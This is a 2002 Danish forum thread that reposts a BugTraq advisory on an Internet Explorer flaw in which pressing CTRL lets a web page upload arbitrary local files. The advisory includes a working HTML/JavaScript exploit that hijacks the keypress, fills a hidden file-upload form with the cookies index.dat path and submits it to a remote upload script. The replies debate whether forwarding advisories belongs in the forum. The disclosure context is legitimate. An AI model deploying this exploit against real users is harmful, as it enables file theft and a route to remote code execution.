Kandu.dk - Pressing CTRL in IE is dangerous


/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

Sikkerhed

#	Navn	Point
1	stl_s	37026
2	arlet	26827
3	miritdk	20260
4	o.v.n.	12167
5	als	8951
6	refi	8694
7	tedd	8272
8	BjarneD	7338
9	Klaudi	7257
10	molokyle	6481

Pressing CTRL in IE is dangerous
Fra : Jens M

Dato : 24-07-02 08:12

Hej Alle,

Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
om ikke andet, så gør i nu =)

-- CnP from BugTraq Begin

- Sandblad advisory #8 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Pressing CTRL in IE is dangerous
Date: [2002-07-23]
Software: Internet Explorer
Impact: Pressing CTRL in IE may result in arbitrary local
file to be uploaded to a remote server (no exact
path needed). If special sensitive information is
uploaded, it may be used to run remote programs.
Vendor: http://www.microsoft.com/ _ _
Patch: none o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

VENDOR STATUS:
==============

02-06-16
Microsoft was contacted about the issue.

02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does
not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."
They proposed the following possible workarounds:
1. disable or set to prompt - "Submit nonencrypted form data" option
2. disable "allow paste operations via script" (best)
3. disable active scripting

DESCRIPTION:
============

A special crafted webpage can retrieve any local file using simple
javascript. This is possible by performing the following steps:

1. When an user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The
result
will be a paste operation with less restrictions.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into
the
form, yielding a change of value for the file upload field (not
normally
allowed).

3. The upload form is submited automaticly (legal javascript
operation).

It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".

Further on, if the local file
"..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, then the random directories needed to get the exact path
to
the temporarily internet folders can be retrieved. Knowing the exact
path
a compiled help file .chm can be dumped and launched with showHelp()
(old
..chm attack). The compiled help file is allowed to have instructions
to
execute arbitrary programs.

EXPLOIT:
========

Instructions:
Put the html code in a remote html document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a
server
side script to take care of the upload process ("upload.php"). If you
choose to use php I recommend
http://www.php.net/manual/en/features.file-upload.php
as a reference on how to setup a server side script taking care of a
file
upload.

Note:
1. Please remove all "!" characters in the exploit code. They have
been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post
action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------

Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.

Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

CnP from BugTraq End --

--
Jens

Alex Holst (24-07-2002)

Kommentar
Fra : Alex Holst

Dato : 24-07-02 11:38

Jens M <jens@xhaboo.dk> wrote:
> Hej Alle,
>
> Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
> om ikke andet, så gør i nu =)

Protest. Skal vi nu til at foere det samme indhold som bugtraq,
vuln-dev, secureprograms, etc? Det synes jeg ikke. Det maa vaere op til
folk selv at modtage relevant sikkerhedsinformation, og det boer ikke
ske i et *diskussionsforum* som dette.

Naar det er sagt, skal der selvfoelgelig vaere plads til at diskutere
ovenstaaende, men det synes jeg ikke du lagde op til i dit "look, mom!
look! i got the first forward!" indlaeg.

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

Flemming Riis (24-07-2002)

Kommentar
Fra : Flemming Riis

Dato : 24-07-02 11:59

"Alex Holst" <a@mongers.org> wrote in message
news:3d3e83a0$0$11820$edfadb0f@dspool01.news.tele.dk

> > Følgende er taget fra BugTraq, jeg ved ikke om I kender til exploiten,
> > om ikke andet, så gør i nu =)
>
> Protest. Skal vi nu til at foere det samme indhold som bugtraq,
> vuln-dev, secureprograms, etc? Det synes jeg ikke. Det maa vaere op til
> folk selv at modtage relevant sikkerhedsinformation, og det boer ikke
> ske i et *diskussionsforum* som dette.

Helst ikke , specialt da de fleste broadcast herinde er flere dage gamle (af
dem jeg har set )

> Naar det er sagt, skal der selvfoelgelig vaere plads til at diskutere
> ovenstaaende, men det synes jeg ikke du lagde op til i dit "look, mom!
> look! i got the first forward!" indlaeg.

Det er ikke noget galt i at snakke om en post så er det jo bare at linke til
org ref og tage den derfra.

Tror de fleste herinde følger de sec lister de har behov for så extra kopier
er i bedste fald spild af båndbredde

Jens M (25-07-2002)

Kommentar
Fra : Jens M

Dato : 25-07-02 10:35

"Flemming Riis" <flemming@riis.nu> wrote in message news:<3d3e8826$0$10677$4d4eb98e@news.dk.uu.net>...

[SNIP]

> Det er ikke noget galt i at snakke om en post så er det jo bare at linke til
> org ref og tage den derfra.

Godt ord igen, jeg kan godt se nu at jeg måske i stedet skulle have
pastet linket til bugTraq i stedet for hele teksten.. Sorry, jeg
begrænser mine posts i fremtiden =)
>
> Tror de fleste herinde følger de sec lister de har behov for så extra kopier
> er i bedste fald spild af båndbredde

Det har ikke altid været tilfældet.

--
Jens

Christian E. Lysel (25-07-2002)

Kommentar
Fra : Christian E. Lysel

Dato : 25-07-02 11:26

Jens M wrote:
>>Tror de fleste herinde følger de sec lister de har behov for så extra kopier
>>er i bedste fald spild af båndbredde
> Det har ikke altid været tilfældet.

Men hvad er der så specielt ved det hul, i forhold til de andre?

Bo Simonsen (26-07-2002)

Kommentar
Fra : Bo Simonsen

Dato : 26-07-02 14:21

In article <4f49b2e4.0207250135.ec4e87d@posting.google.com>, Jens M wrote:

> Godt ord igen, jeg kan godt se nu at jeg måske i stedet skulle have
> pastet linket til bugTraq i stedet for hele teksten.. Sorry, jeg
> begrænser mine posts i fremtiden =)

En af grundene til at din post er irrelavant, er at det ikke er os alle
herinde der benytter Windows. Prøv evt. og kik i headers i posts, der
burde du nok kunne finde en del 'slrn x.x.x.x
(Linux/FreeBSD/OpenBSD/SunOS, etc).

Og som Alex sagde at det er et diskusionsforum og ikke en security-mailingliste.

--
Med venlig hilsen
Bo Simonsen

http://fido.geekworld.dk

rea721 (28-07-2002)

Kommentar
Fra : rea721

Dato : 28-07-02 21:34

"Bo Simonsen" <paltas@geekworld.dk> skrev

> En af grundene til at din post er irrelavant, er at det ikke er os alle
> herinde der benytter Windows. Prøv evt. og kik i headers i posts, der
> burde du nok kunne finde en del 'slrn x.x.x.x
> (Linux/FreeBSD/OpenBSD/SunOS, etc).

Det er da en fuldstændig irrelevant grund...styrresystemet har ikke
indflydelse på relevansen af postingen. Desuden behøver man ikke poste i
gruppen for at ha interresse i sikkerhed.

> Og som Alex sagde at det er et diskusionsforum og ikke en
security-mailingliste.

Den her grund er til gændgæld glimragende.

--
Rea721 AKA Leon Andrea rea721@fabel.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.

Søg

Reklame

Statistik

Spørgsmål :	177501
Tips :	31968
Nyheder :	719565
Indlæg :	6408527
Brugere :	218887

Månedens bedste

Årets bedste

Sidste års bedste